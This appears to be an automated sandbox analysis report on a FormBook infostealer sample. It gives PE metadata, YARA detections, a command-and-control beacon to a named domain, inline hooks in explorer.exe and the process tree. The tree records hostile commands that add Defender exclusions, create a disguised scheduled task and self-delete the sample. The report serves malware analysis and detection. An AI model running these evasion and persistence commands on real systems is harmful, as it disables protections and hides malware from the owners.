                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210504180137..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 414408 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe..Process ID: 6424..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210504180137..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe..**********************..Windows PowerShell transcript start..Start time: 20210504180747..Username: computer\user..RunAs User: DESKTOP

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.525234190780704
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:Ms5nQdSz5l.exe
                                                  File size:734720
                                                  MD5:ba01df16e4c876e078348fd4479a8fdf
                                                  SHA1:6c7f20976d3e7d9bf9f8a410cbc54962d1ef52bb
                                                  SHA256:8353e30c6566795da3e5aa38a22b4707ee895cfa115ffa399cfbe7d57d00f91d
                                                  SHA512:7d828277f9dfd39755b015cb25ee713159c2cf9d812ea938b408e0c21b9004b72d9efa21def95dfa307838db56558fd8e507ad10b887e1ed7ca1219a53e8747c
                                                  SSDEEP:12288:OxIvnbBjqfKMpnc2FOAeqL6oPUxMnHIqKG6BcmKd4pC+sO6cHksc5w3sLj19nFY:OVHUxCHIqKG6Bw5yTc5yo19nF
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.2...............P......L........... ... ....@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:dcb29292c8ccf6c8

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4b06d6
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0xDA32965F [Tue Jan 1 18:33:03 2086 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb06840x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x482c.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xb80000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xb06680x1c.text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000xae6dc0xae800False0.80517997851COM executable for DOS7.5188778941IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xb20000x482c0x4a00False0.918549408784data7.81051847098IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xb80000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_ICON0xb21300x4197PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                  RT_GROUP_ICON0xb62c80x14data
                                                  RT_VERSION0xb62dc0x364data
                                                  RT_MANIFEST0xb66400x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Version Infos

                                                  DescriptionData
                                                  Translation0x0000 0x04b0
                                                  LegalCopyrightCopyright 2019
                                                  Assembly Version1.0.0.0
                                                  InternalNameInvalidCastException.exe
                                                  FileVersion1.0.0.0
                                                  CompanyName
                                                  LegalTrademarks
                                                  Comments
                                                  ProductNameStarEggControl
                                                  ProductVersion1.0.0.0
                                                  FileDescriptionStarEggControl
                                                  OriginalFilenameInvalidCastException.exe

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  05/04/21-18:02:46.816027TCP1201ATTACK-RESPONSES 403 Forbidden804971734.102.136.180192.168.2.5

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  May 4, 2021 18:02:46.634438038 CEST4971780192.168.2.534.102.136.180
                                                  May 4, 2021 18:02:46.675184965 CEST804971734.102.136.180192.168.2.5
                                                  May 4, 2021 18:02:46.677416086 CEST4971780192.168.2.534.102.136.180
                                                  May 4, 2021 18:02:46.677593946 CEST4971780192.168.2.534.102.136.180
                                                  May 4, 2021 18:02:46.719705105 CEST804971734.102.136.180192.168.2.5
                                                  May 4, 2021 18:02:46.816026926 CEST804971734.102.136.180192.168.2.5
                                                  May 4, 2021 18:02:46.816056013 CEST804971734.102.136.180192.168.2.5
                                                  May 4, 2021 18:02:46.816281080 CEST4971780192.168.2.534.102.136.180
                                                  May 4, 2021 18:02:46.816380978 CEST4971780192.168.2.534.102.136.180
                                                  May 4, 2021 18:02:46.859430075 CEST804971734.102.136.180192.168.2.5

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  May 4, 2021 18:00:49.907799959 CEST4955753192.168.2.58.8.8.8
                                                  May 4, 2021 18:00:49.956352949 CEST53495578.8.8.8192.168.2.5
                                                  May 4, 2021 18:00:51.020155907 CEST6173353192.168.2.58.8.8.8
                                                  May 4, 2021 18:00:51.071681023 CEST53617338.8.8.8192.168.2.5
                                                  May 4, 2021 18:00:51.750638962 CEST6544753192.168.2.58.8.8.8
                                                  May 4, 2021 18:00:51.804084063 CEST53654478.8.8.8192.168.2.5
                                                  May 4, 2021 18:00:52.373558044 CEST5244153192.168.2.58.8.8.8
                                                  May 4, 2021 18:00:52.425172091 CEST53524418.8.8.8192.168.2.5
                                                  May 4, 2021 18:00:54.343322992 CEST6217653192.168.2.58.8.8.8
                                                  May 4, 2021 18:00:54.403337955 CEST53621768.8.8.8192.168.2.5
                                                  May 4, 2021 18:00:55.471920967 CEST5959653192.168.2.58.8.8.8
                                                  May 4, 2021 18:00:55.520484924 CEST53595968.8.8.8192.168.2.5
                                                  May 4, 2021 18:00:56.800488949 CEST6529653192.168.2.58.8.8.8
                                                  May 4, 2021 18:00:56.854403973 CEST53652968.8.8.8192.168.2.5
                                                  May 4, 2021 18:01:00.374254942 CEST6318353192.168.2.58.8.8.8
                                                  May 4, 2021 18:01:00.422900915 CEST53631838.8.8.8192.168.2.5
                                                  May 4, 2021 18:01:01.839873075 CEST6015153192.168.2.58.8.8.8
                                                  May 4, 2021 18:01:01.897089005 CEST53601518.8.8.8192.168.2.5
                                                  May 4, 2021 18:01:03.932302952 CEST5696953192.168.2.58.8.8.8
                                                  May 4, 2021 18:01:03.983825922 CEST53569698.8.8.8192.168.2.5
                                                  May 4, 2021 18:01:18.462794065 CEST5516153192.168.2.58.8.8.8
                                                  May 4, 2021 18:01:18.521301985 CEST53551618.8.8.8192.168.2.5
                                                  May 4, 2021 18:01:43.801347017 CEST5475753192.168.2.58.8.8.8
                                                  May 4, 2021 18:01:43.855362892 CEST53547578.8.8.8192.168.2.5
                                                  May 4, 2021 18:02:46.423053026 CEST4999253192.168.2.58.8.8.8
                                                  May 4, 2021 18:02:46.627899885 CEST53499928.8.8.8192.168.2.5
                                                  May 4, 2021 18:03:06.997164011 CEST6007553192.168.2.58.8.8.8
                                                  May 4, 2021 18:03:07.055994034 CEST53600758.8.8.8192.168.2.5

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  May 4, 2021 18:02:46.423053026 CEST192.168.2.58.8.8.80xe039Standard query (0)www.safifinancial.infoA (IP address)IN (0x0001)
                                                  May 4, 2021 18:03:06.997164011 CEST192.168.2.58.8.8.80x87ebStandard query (0)www.4980057280880200.xyzA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  May 4, 2021 18:02:46.627899885 CEST8.8.8.8192.168.2.50xe039No error (0)www.safifinancial.infosafifinancial.infoCNAME (Canonical name)IN (0x0001)
                                                  May 4, 2021 18:02:46.627899885 CEST8.8.8.8192.168.2.50xe039No error (0)safifinancial.info34.102.136.180A (IP address)IN (0x0001)
                                                  May 4, 2021 18:03:07.055994034 CEST8.8.8.8192.168.2.50x87ebName error (3)www.4980057280880200.xyznonenoneA (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.safifinancial.info

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.54971734.102.136.18080C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 4, 2021 18:02:46.677593946 CEST1301OUTGET /op9s/?kxl0=3OIkoiHCzE1hCgamnAGWyNY23l3GjmrmFj0eumUXTWZXUNP+r8qibU1KsAhTf4lNnle5&kPm0g=K8kX HTTP/1.1
                                                  Host: www.safifinancial.info
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  May 4, 2021 18:02:46.816026926 CEST1302INHTTP/1.1 403 Forbidden
                                                  Server: openresty
                                                  Date: Tue, 04 May 2021 16:02:46 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 275
                                                  ETag: "6089beab-113"
                                                  Via: 1.1 google
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                  Code Manipulations

                                                  User Modules

                                                  Hook Summary

                                                  Function NameHook TypeActive in Processes
                                                  PeekMessageAINLINEexplorer.exe
                                                  PeekMessageWINLINEexplorer.exe
                                                  GetMessageWINLINEexplorer.exe
                                                  GetMessageAINLINEexplorer.exe

                                                  Processes

                                                  Process: explorer.exe, Module: user32.dll
                                                  Function NameHook TypeNew Data
                                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE3
                                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE3
                                                  GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE3
                                                  GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE3

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Start time:18:00:56
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\Desktop\Ms5nQdSz5l.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
                                                  Imagebase:0xc40000
                                                  File size:734720 bytes
                                                  MD5 hash:BA01DF16E4C876E078348FD4479A8FDF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Start time:18:01:00
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
                                                  Imagebase:0x9a0000
                                                  File size:430592 bytes
                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:18:01:01
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7ecfc0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:18:01:01
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
                                                  Imagebase:0x9a0000
                                                  File size:430592 bytes
                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:18:01:01
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7ecfc0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:18:01:01
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp'
                                                  Imagebase:0x20000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:18:01:02
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7ecfc0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:18:01:02
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
                                                  Imagebase:0x9a0000
                                                  File size:430592 bytes
                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:18:01:03
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff797770000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:18:01:03
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\Desktop\Ms5nQdSz5l.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\Ms5nQdSz5l.exe
                                                  Imagebase:0x620000
                                                  File size:734720 bytes
                                                  MD5 hash:BA01DF16E4C876E078348FD4479A8FDF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:18:01:07
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:
                                                  Imagebase:0x7ff693d90000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:18:02:03
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\mstsc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\mstsc.exe
                                                  Imagebase:0xc70000
                                                  File size:3444224 bytes
                                                  MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  General

                                                  Start time:18:02:08
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
                                                  Imagebase:0xa0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Start time:18:02:09
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7ecfc0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >